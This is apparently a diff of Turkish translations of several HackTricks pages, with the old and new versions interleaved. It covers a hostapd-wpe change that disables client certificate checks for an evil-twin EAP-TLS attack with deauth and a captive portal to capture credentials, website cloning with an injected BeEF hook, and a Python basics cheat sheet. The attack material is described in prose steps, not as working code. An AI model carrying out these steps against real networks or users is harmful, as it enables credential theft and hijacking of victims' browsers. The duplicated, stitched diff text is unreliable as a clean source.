EAP-TLS, sertifikalar kullanarak istemci ve sunucu arasında karşılıklı kimlik doğrulama sağlayan bir güvenlik protokolüdür. Bağlantı, istemci ve sunucunun birbirlerinin sertifikalarını doğrulaması durumunda yalnızca kurulur.
EAP-TLS, sertifikaları kullanarak istemci ve sunucu arasında karşılıklı kimlik doğrulaması sağlayan bir güvenlik protokolüdür. Bağlantı, yalnızca istemci ve sunucunun birbirlerinin sertifikalarını doğrulaması durumunda kurulur.
#### Karşılaşılan Zorluk
Bir değerlendirme sırasında, `hostapd-wpe` aracını kullanırken ilginç bir hatayla karşılaşıldı. Aracın, istemcinin sertifikasının bilinmeyen bir Sertifika Yetkilisi (CA) tarafından imzalanmış olması nedeniyle istemcinin bağlantısını reddettiği belirlendi. Bu durum, istemcinin sahte sunucunun sertifikasına güvendiğini göstererek istemci tarafındaki gevşek güvenlik yapılandırmalarını işaret etti.
Bir değerlendirme sırasında, `hostapd-wpe` aracını kullanırken ilginç bir hata ile karşılaşıldı. Aracın, istemcinin sertifikasının bilinmeyen bir Sertifika Yetkilisi (CA) tarafından imzalanmış olmasından dolayı istemcinin bağlantısını reddetti. Bu, istemcinin sahte sunucunun sertifikasına güvendiğini göstererek, istemci tarafındaki gevşek güvenlik yapılandırmalarını işaret etti.
#### Amaç: Orta Adam Saldırısı (MiTM) Kurulumu
Hedef, aracı herhangi bir istemci sertifikasını kabul edecek şekilde değiştirmekti. Bu, kötü niyetli kablosuz ağıyla bağlantı kurmayı ve MiTM saldırısı yapmayı, potansiyel olarak düz metin kimlik bilgilerini veya diğer hassas verileri ele geçirmeyi mümkün kılacaktı.
Amacımız, aracı herhangi bir istemci sertifikasını kabul edecek şekilde değiştirmekti. Bu, kötü niyetli kablosuz ağ ile bağlantı kurmaya ve MiTM saldırısını etkinleştirmeye olanak tanıyacak, potansiyel olarak düz metin kimlik bilgilerini veya diğer hassas verileri yakalamaya olanak sağlayacaktı.
#### Çözüm: `hostapd-wpe`'yi Değiştirmek
`hostapd-wpe`'nin kaynak kodunun analizi, istemci sertifikası doğrulamasının OpenSSL işlevi `SSL_set_verify` içindeki bir parametre (`verify_peer`) tarafından kontrol edildiğini ortaya çıkardı. Bu parametrenin değerini 1 (doğrula) yerine 0 (doğrulama yapma) olarak değiştirerek, aracın herhangi bir istemci sertifikasını kabul etmesi sağlandı.
#### Çözüm: `hostapd-wpe`'yi Değiştirme
`hostapd-wpe`'nin kaynak kodunun incelenmesi, istemci sertifikası doğrulamasının OpenSSL işlevi `SSL_set_verify` içindeki bir parametre (`verify_peer`) tarafından kontrol edildiğini ortaya koydu. Bu parametrenin değerini 1'den (doğrulama) 0'a (doğrulama yapma) değiştirerek, aracın herhangi bir istemci sertifikasını kabul etmesi sağlandı.
#### Saldırının Yürütülmesi
1. **Ortam Kontrolü:** Kablosuz ağları izlemek ve hedefleri belirlemek için `airodump-ng` kullanın.
2. **Sahte AP Kurulumu:** Değiştirilmiş `hostapd-wpe`'yi çalıştırarak hedef ağı taklit eden sahte bir Erişim Noktası (AP) oluşturun.
3. **Captive Portal Özelleştirme:** Hedef kullanıcıya gerçek ve tanıdık görünen bir captive portal giriş sayfası özelleştirin.
4. **De-auth Saldırısı:** İsteğe bağlı olarak, istemciyi meşru ağdan koparıp sahte AP'ye bağlamak için bir de-auth saldırısı gerçekleştirin.
5. **Kimlik Bilgilerini Yakalama:** İstemci sahte AP'ye bağlandığında ve captive portal ile etkileşime geçtiğinde, kimlik bilgileri yakalanır.
2. **Sahte AP Kurulumu:** Değiştirilmiş `hostapd-wpe`'yi çalıştırarak, hedef ağı taklit eden sahte bir Erişim Noktası (AP) oluşturun.
3. **Tutsak Portalı Özelleştirme:** Tutsak portalının giriş sayfasını hedef kullanıcı için meşru ve tanıdık görünmesi için özelleştirin.
4. **De-authentication Saldırısı:** İsteğe bağlı olarak, istemciyi meşru ağdan ayırmak ve onları sahte AP'ye bağlamak için bir de-auth saldırısı gerçekleştirin.
5. **Kimlik Bilgilerinin Yakalanması:** İstemci sahte AP'ye bağlandığında ve tutsak portalı ile etkileşime geçtiğinde, kimlik bilgileri yakalanır.
#### Saldırıdan Gözlemler
- Windows makinelerinde, web gezintisi denendiğinde sahte AP'ye otomatik olarak bağlanabilir ve captive portal sunulabilir.
- Bir iPhone'da, kullanıcı yeni bir sertifikayı kabul etmesi istenebilir ve ardından captive portal sunulabilir.
- Windows makinelerinde, sistem web gezintisi denendiğinde sahte AP'ye otomatik olarak bağlanabilir ve tutsak portalı sunulabilir.
- iPhone'da, kullanıcıya yeni bir sertifika kabul etmesi gerektiği ve ardından tutsak portalının sunulacağı bildirilebilir.
#### Sonuç
EAP-TLS güvenli kabul edilse de, etkinliği doğru yapılandırmaya ve dikkatli kullanıcı davranışına bağlıdır. Yanlış yapılandırılmış cihazlar veya şüphelenmeyen kullanıcılar tarafından kabul edilen sahte sertifikalar, EAP-TLS korumalı bir ağın güvenliğini zayıflatabilir.
EAP-TLS güvenli kabul edilse de, etkinliği doğru yapılandırmaya ve son kullanıcıların dikkatli davranışlarına bağlıdır. Yanlış yapılandırılmış cihazlar veya habersiz kullanıcılar, EAP-TLS korumalı bir ağın güvenliğini zayıflatabilir.
Daha fazla ayrıntı için https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/ adresini kontrol edin.
@ -57,18 +58,21 @@ Daha fazla ayrıntı için https://versprite.com/blog/application-security/eap-t
* [https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/](https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/)
<img src="../../.gitbook/assets/i3.png" alt="" data-size="original">\
**Ödül avı ipucu**: **Hackerlar tarafından oluşturulan premium bir ödül avı platformu olan Intigriti'ye** kaydolun! Bugün [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) adresine katılın ve **100.000 $'a kadar ödüller kazanmaya başlayın**!
**Ödül avcılığı ipucu**: **Intigriti'ye kaydolun**, hackerlar tarafından oluşturulan bir premium **ödül avcılığı platformu**! Bugün [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) adresinde bize katılın ve **$100,000**'a kadar ödüller kazanmaya başlayın!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'i desteklemenin diğer yolları:
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR gönderin.
* Şirketinizi HackTricks'te **reklamınızı görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'i keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı **takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlo
</details>
{% endhint %}

View file

@ -1,16 +1,17 @@
{% hint style="success" %}
AWS Hacking'ı öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Sıfırdan kahraman olmaya kadar AWS hacklemeyi öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na (https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek HackTricks** ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
@ -18,9 +19,9 @@ HackTricks'ı desteklemenin diğer yolları:
Bazen bir siber güvenlik değerlendirmesi için tamamen **bir web sitesini klonlamak** faydalı olabilir.
Bazen bir siber güvenlik değerlendirmesi için tamamen bir web sitesini **kopyalamak** faydalı olabilir.
Klonlanmış web sitesine kullanıcının sekmesini "kontrol etmek" için BeEF kancası gibi bazı payload'lar da ekleyebileceğinizi unutmayın.
Klonlanmış web sitesine bir BeEF kancası gibi bazı payload'lar da ekleyebileceğinizi unutmayın, böylece kullanıcının sekmesini "kontrol" edebilirsiniz.
Bu amaçla kullanabileceğiniz farklı araçlar bulunmaktadır:
@ -41,16 +42,18 @@ goclone <url>
{% embed url="https://websec.nl/" %}
{% hint style="success" %}
Öğren ve AWS Hacking pratiği yap:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Öğren ve GCP Hacking pratiği yap: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Sıfırdan kahramana kadar AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekle</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
* [**The PEASS Family**]'yi keşfedin (https://opensea.io/collection/the-peass-family), özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol et!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katıl veya [**telegram grubuna**](https://t.me/peass) katıl veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip et.**
* Hacking püf noktalarını paylaşmak için PR'lar göndererek **HackTricks** ve **HackTricks Cloud** github depolarına katkıda bulun.
</details>
{% endhint %}

View file

@ -1,30 +1,31 @@
# Temel Python
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahramanla öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklam vermek isterseniz** veya **HackTricks'i PDF olarak indirmek isterseniz** [**ABONELİK PLANLARINA**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 **Discord grubuna** [**katılın**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin**.
* **HackTricks** ve **HackTricks Cloud** github depolarına PR göndererek hacking püf noktalarını paylaşın.
</details>
{% endhint %}
## Python Temelleri
### Faydalı bilgiler
list(xrange()) == range() --> Python3'te range, python2'nin xrange'ıdır (bir liste değil, bir üreteçtir)\
Bir Tuple ve Bir Liste arasındaki fark, bir tuple'daki bir değerin konumunun ona anlam vermesidir, ancak listeler sadece sıralı değerlerdir. Tuples yapıya sahiptir, ancak listeler bir sıraya sahiptir.
list(xrange()) == range() --> Python3'te range, Python2'nin xrange'ine denk gelir (bir liste değil, bir üreteçtir)\
Bir Tuple ve Bir Liste arasındaki fark, bir değerin bir tuple içindeki konumunun anlam taşımasıdır ancak listeler sadece sıralı değerlerdir. Tuples yapıya sahiptir ancak listeler sıralıdır.
### Temel işlemler
Bir sayıyı yükseltmek için: 3\*\*2 (3^2 değil)\
2/3 yaparsanız, iki tamsayıyı (integers) böldüğünüz için 1 döner. Ondalık sayılar istiyorsanız float'ları bölmelisiniz (2.0/3.0).\
Bir sayıyı üssü almak için kullanılır: 3\*\*2 (3^2 değil)\
Eğer 2/3 yaparsanız 1 döner çünkü iki tamsayıyı (integer) bölersiniz. Ondalıklı sonuçlar istiyorsanız float'ları bölmelisiniz (2.0/3.0).\
i >= j\
i <= j\
i == j\
@ -46,8 +47,8 @@ isinstance(1, int) = True\
"abcdef".contains("abc") = True\
"abc\n".strip() = "abc"\
"apbc".replace("p","") = "abc"\
dir(str) = Tüm mevcut yöntemlerin listesi\
help(str) = str sınıfının tanımı\
dir(str) = Tüm mevcut metodların listesi\
help(str) = class str'in tanımı\
"a".upper() = "A"\
"A".lower() = "a"\
"abc".capitalize() = "Abc"\
@ -70,7 +71,7 @@ sorted(\[1,43,5,3,21,4])
\# Tek satırlık yorum\
"""\
Birkaç satırlık yorum\
Bir diğeri\
Başka bir tane\
"""
**Döngüler**
@ -91,16 +92,16 @@ for i in range(0,100):
for letter in "hola":
#something with a letter in "hola"
```
### Tuplelar
### Demetler
t1 = (1, '2', 'üç')\
t2 = (5, 6)\
t3 = t1 + t2 = (1, '2', 'üç', 5, 6)\
(4,) = Tek elemanlı\
d = () boş tuple\
d += (4,) --> Tuple'a ekleme yapma\
d = () boş demet\
d += (4,) --> Demete ekleme\
YAPAMAZSIN! --> t1\[1] == 'Yeni değer'\
list(t2) = \[5, 6] --> Tuple'dan liste yapma
list(t2) = \[5, 6] --> Demetten listeye
### Liste (dizi)
@ -109,44 +110,44 @@ a = \[1, 2, 3]\
b = \[4, 5]\
a + b = \[1, 2, 3, 4, 5]\
b.append(6) = \[4, 5, 6]\
tuple(a) = (1, 2, 3) --> Listeden tuple yapma
tuple(a) = (1, 2, 3) --> Listeden demete
### Sözlük
d = {} boş\
ayNumaraları = {1: 'Oca', 2: 'şub', 'şub': 2} --> ayNumaraları -> {1: 'Oca', 2: 'şub', 'şub': 2}\
ayNumaraları\[1] = 'Oca'\
ayNumaraları\[şub] = 2\
list(ayNumaraları) = \[1, 2, 'şub']\
ayNumaraları.values() = \['Oca', 'şub', 2]\
keys = \[k for k in ayNumaraları]\
a = {'9': 9}\
ayNumaraları.update(a) = {'9': 9, 1: 'Oca', 2: 'şub', 'şub': 2}\
mN = ayNumaraları.copy() #Bağımsız kopya\
ayNumaraları.get('anahtar', 0) #Anahtar var mı diye kontrol et, ayNumaraları\["anahtar"]'ın değerini döndür veya yoksa 0 döndür
monthNumbers={1:'Oca', 2: 'şub','şub':2}—> monthNumbers ->{1:'Oca', 2: 'şub','şub':2}\
monthNumbers\[1] = 'Oca'\
monthNumbers\['şub'] = 2\
list(monthNumbers) = \[1, 2, 'şub']\
monthNumbers.values() = \['Oca', 'şub', 2]\
keys = \[k for k in monthNumbers]\
a={'9':9}\
monthNumbers.update(a) = {'9':9, 1:'Oca', 2: 'şub','şub':2}\
mN = monthNumbers.copy() #Bağımsız kopya\
monthNumbers.get('anahtar',0) #Anahtar var mı kontrol et, monthNumbers\["anahtar"]'ın değerini döndür veya yoksa 0 döndür
### Küme
Kümelerde tekrarlamalar yoktur\
Kümelerde tekrarlar yoktur\
myset = set(\['a', 'b']) = {'a', 'b'}\
myset.add('c') = {'a', 'b', 'c'}\
myset.add('a') = {'a', 'b', 'c'} #Tekrarlamalar yok\
myset.add('a') = {'a', 'b', 'c'} #Tekrar yok\
myset.update(\[1, 2, 3]) = set(\['a', 1, 2, 'b', 'c', 3])\
myset.discard(10) #Eğer varsa kaldır, yoksa bir şey yapma\
myset.remove(10) #Eğer varsa kaldır, yoksa hata ver\
myset.discard(10) #Varsa kaldır, yoksa değişiklik yapma\
myset.remove(10) #Var ise kaldır, yoksa hata ver\
myset2 = set(\[1, 2, 3, 4])\
myset.union(myset2) #myset VEYA myset2'deki değerler\
myset.union(myset2) #myset VEYA myset2 değerleri\
myset.intersection(myset2) #myset VE myset2'deki değerler\
myset.difference(myset2) #myset'teki ama myset2'de olmayan değerler\
myset.symmetric\_difference(myset2) #myset VE myset2'de olmayan değerler (her ikisinde de olmayan)\
myset.symmetric\_difference(myset2) #myset VE myset2'de olmayan değerler (ikisinde de olmayan)\
myset.pop() #Kümenin ilk elemanını al ve kaldır\
myset.intersection\_update(myset2) #myset = myset VE myset2'deki elemanlar\
myset.intersection\_update(myset2) #myset = myset ve myset2'deki elemanlar\
myset.difference\_update(myset2) #myset = myset'teki ama myset2'de olmayan elemanlar\
myset.symmetric\_difference\_update(myset2) #myset = myset VE myset2'de olmayan elemanlar
myset.symmetric\_difference\_update(myset2) #myset = ikisinde de olmayan elemanlar
### Sınıflar
\_\_It\_\_ içindeki yöntem, bu sınıfın bir nesnesinin diğerinden daha büyük olup olmadığını karşılaştırmak için sort tarafından kullanılacak yöntem olacaktır.
\_\_It\_\_ içindeki metod, bu sınıfın bir nesnesinin diğerinden büyük olup olmadığını karşılaştırmak için kullanılacaktır.
```python
class Person(name):
def __init__(self,name):
@ -174,20 +175,20 @@ MITPerson.nextIdNum += 1 #Attribute of the class +1
def __it__(self, other):
return self.idNum < other.idNum
```
### map, zip, filter, lambda, sorted ve tek satırlar
### map, zip, filter, lambda, sorted ve tek satırlık ifadeler
**Map** şu şekilde çalışır: \[f(x) for x in iterable] --> map(tutple,\[a,b]) = \[(1,2,3),(4,5)]\
**Map** şuna benzer: \[f(x) for x in iterable] --> map(tutple,\[a,b]) = \[(1,2,3),(4,5)]\
m = map(lambda x: x % 3 == 0, \[1, 2, 3, 4, 5, 6, 7, 8, 9]) --> \[False, False, True, False, False, True, False, False, True]
**zip** foo veya bar'ın daha kısa olanı durduğunda durur:
**Zip**, foo veya bar'ın daha kısa olanı durduğunda durur:
```
for f, b in zip(foo, bar):
print(f, b)
```
**Lambda**, bir fonksiyon tanımlamak için kullanılır\
(lambda x,y: x+y)(5,3) = 8 --> Basit bir **fonksiyon** olarak lambda kullanın\
**sorted**(range(-5,6), key=lambda x: x\*\* 2) = \[0, -1, 1, -2, 2, -3, 3, -4, 4, -5, 5] --> Bir listeyi sıralamak için lambda kullanın\
m = **filter**(lambda x: x % 3 == 0, \[1, 2, 3, 4, 5, 6, 7, 8, 9]) = \[3, 6, 9] --> Filtrelemek için lambda kullanın\
(lambda x,y: x+y)(5,3) = 8 --> Lambda'yı basit bir **fonksiyon** olarak kullanın\
**sorted**(range(-5,6), key=lambda x: x\*\* 2) = \[0, -1, 1, -2, 2, -3, 3, -4, 4, -5, 5] --> Bir liste sıralamak için lambda kullanın\
m = **filter**(lambda x: x % 3 == 0, \[1, 2, 3, 4, 5, 6, 7, 8, 9]) = \[3, 6, 9] --> Filtreleme yapmak için lambda kullanın\
**reduce** (lambda x,y: x\*y, \[1,2,3,4]) = 24
```
def make_adder(n):
@ -199,10 +200,12 @@ class Car:
crash = lambda self: print('Boom!')
my_car = Car(); my_car.crash() = 'Boom!'
```
```markdown
mult1 = \[x for x in \[1, 2, 3, 4, 5, 6, 7, 8, 9] if x%3 == 0 ]
### İstisnalar
```
```
def divide(x,y):
try:
result = x/y
@ -217,7 +220,7 @@ print “executing finally clause in any case”
```
### Assert()
Eğer koşul yanlış ise, dize ekran üzerinde yazdırılacaktır.
Eğer koşul yanlışsa dize ekranda yazdırılacaktır
```
def avg(grades, weights):
assert not len(grades) == 0, 'no grades data'
@ -225,12 +228,13 @@ assert len(grades) == 'wrong number grades'
```
### Üreteçler, yield
Bir üreteç, bir şey döndürmek yerine bir şey "yield" eder. Ona eriştiğinizde, ilk üretilen değeri "döndürür" ve sonra tekrar erişebilirsiniz ve bir sonraki üretilen değeri döndürür. Bu nedenle, tüm değerler aynı anda üretilmez ve tüm değerleri içeren bir liste yerine bunu kullanarak çok fazla bellek tasarrufu sağlanabilir.
Bir üreteç, bir şeyi döndürmek yerine bir şeyi "yield" eder. Ona eriştiğinizde, üretilen ilk değeri "döndürecektir", sonra tekrar erişebilir ve üretilen bir sonraki değeri döndürecektir. Bu nedenle, tüm değerler aynı anda üretilmez ve tüm değerleri içeren bir listeden daha az bellek kullanarak bunu kullanmak daha avantajlı olabilir.
```
def myGen(n):
yield n
yield n + 1
```
```markdown
g = myGen(6) --> 6\
next(g) --> 7\
next(g) --> Hata
@ -252,12 +256,12 @@ re.findall("\w+(la)","hola caracola") = \['la', 'la']
$ --> İle biter\
\+ --> Bir veya daha fazla\
\* --> 0 veya daha fazla\
? --> 0 veya 1 kez
? --> 0 veya 1 oluşum
**Seçenekler:**\
re.search(pat,str,re.IGNORECASE)\
IGNORECASE\
DOTALL --> Noktanın yeni satırı eşleştirmesine izin verir\
DOTALL --> Noktanın yeni satırla eşleşmesine izin verir\
MULTILINE --> ^ ve $'ın farklı satırlarda eşleşmesine izin verir
re.findall("<.\*>", "\<b>foo\</b>and\<i>so on\</i>") = \['\<b>foo\</b>and\<i>so on\</i>']\
@ -265,26 +269,27 @@ re.findall("<.\*?>", "\<b>foo\</b>and\<i>so on\</i>") = \['\<b>', '\</b>', '\<i>
IterTools\
**product**\
from **itertools** import product --> 1 veya daha fazla liste arasında kombinasyonlar oluşturur, değerleri tekrarlayabilir, kartez ürünü (dağıtma özelliği)\
from **itertools** import product --> 1 veya daha fazla liste arasında kombinasyonlar oluşturur, değerleri tekrarlayabilir, çarpım (dağıtma özelliği)\
print list(**product**(\[1,2,3],\[3,4])) = \[(1, 3), (1, 4), (2, 3), (2, 4), (3, 3), (3, 4)]\
print list(**product**(\[1,2,3],repeat = 2)) = \[(1, 1), (1, 2), (1, 3), (2, 1), (2, 2), (2, 3), (3, 1), (3, 2), (3, 3)]
**permutations**\
from **itertools** import **permutations** --> Her pozisyonda tüm karakterlerin kombinasyonlarını oluşturur\
print list(permutations(\['1','2','3'])) = \[('1', '2', '3'), ('1', '3', '2'), ('2', '1', '3'),... Tüm olası kombinasyonlar\
print(list(permutations('123',2))) = \[('1', '2'), ('1', '3'), ('2', '1'), ('2', '3'), ('3', '1'), ('3', '2')] Uzunluğu 2 olan tüm olası kombinasyonlar
from **itertools** import **permutations** --> Her pozisyondaki tüm karakterlerin kombinasyonlarını oluşturur\
print list(permutations(\['1','2','3'])) = \[('1', '2', '3'), ('1', '3', '2'), ('2', '1', '3'),... Her olası kombinasyon\
print(list(permutations('123',2))) = \[('1', '2'), ('1', '3'), ('2', '1'), ('2', '3'), ('3', '1'), ('3', '2')] Uzunluğu 2 olan her olası kombinasyon
**combinations**\
from itertools import **combinations** --> Tekrar eden karakterleri olmadan tüm olası kombinasyonları oluşturur ("ab" varsa "ba" oluşturmaz)\
from itertools import **combinations** --> Tekrar eden karakterler olmadan tüm olası kombinasyonları oluşturur ("ab" varsa, "ba" oluşturmaz)\
print(list(**combinations**('123',2))) --> \[('1', '2'), ('1', '3'), ('2', '3')]
**combinations\_with\_replacement**\
from itertools import **combinations\_with\_replacement** --> Karakterden sonraki tüm olası kombinasyonları oluşturur (örneğin, 3. karakter 3. karakterden itibaren karıştırılır, ancak 2. veya 1. ile karıştırılmaz)\
from itertools import **combinations\_with\_replacement** --> Karakterlerden sonrasındaki tüm olası kombinasyonları oluşturur (örneğin, 3. 3. ile karıştırılır ancak 2. veya 1. ile değil)\
print(list(**combinations\_with\_replacement**('1133',2))) = \[('1', '1'), ('1', '1'), ('1', '3'), ('1', '3'), ('1', '1'), ('1', '3'), ('1', '3'), ('3', '3'), ('3', '3'), ('3', '3')]
### Dekoratörler
Bir fonksiyonun çalışması için gereken süreyi ölçen bir dekoratör (buradan alındı: [buradan](https://towardsdatascience.com/decorating-functions-in-python-619cbbe82c74)):
Bir fonksiyonun çalıştırılması için gereken süreyi ölçen dekoratör ([buradan](https://towardsdatascience.com/decorating-functions-in-python-619cbbe82c74)):
```
```python
from functools import wraps
import time
@ -308,16 +313,17 @@ Let's call our decorated function
Decorated func!
Execution time: 4.792213439941406e-05 seconds
```
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenmek için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>'ı öğrenin!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
